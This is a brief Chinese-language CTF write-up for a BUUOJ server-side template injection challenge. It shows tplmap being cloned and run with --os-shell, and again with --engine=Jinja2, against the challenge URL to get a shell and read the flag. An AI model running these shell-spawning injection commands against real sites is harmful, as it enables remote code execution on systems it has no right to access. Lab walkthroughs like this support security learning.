输入1,随后使用burp抓包
发现了ssssssti & a little trick,猜测是ssti模板注入
使用tplmap检测
tplmap下载
git clone https://github.com/epinna/tplmap
下载后进入目录,随后输入
./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=--os-shell
运行结果:
可以看到模板是jinja2
随后输入:
./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=1 --os-shell --engine=Jinja2
成功看到了flag
当然也可以使用手工注入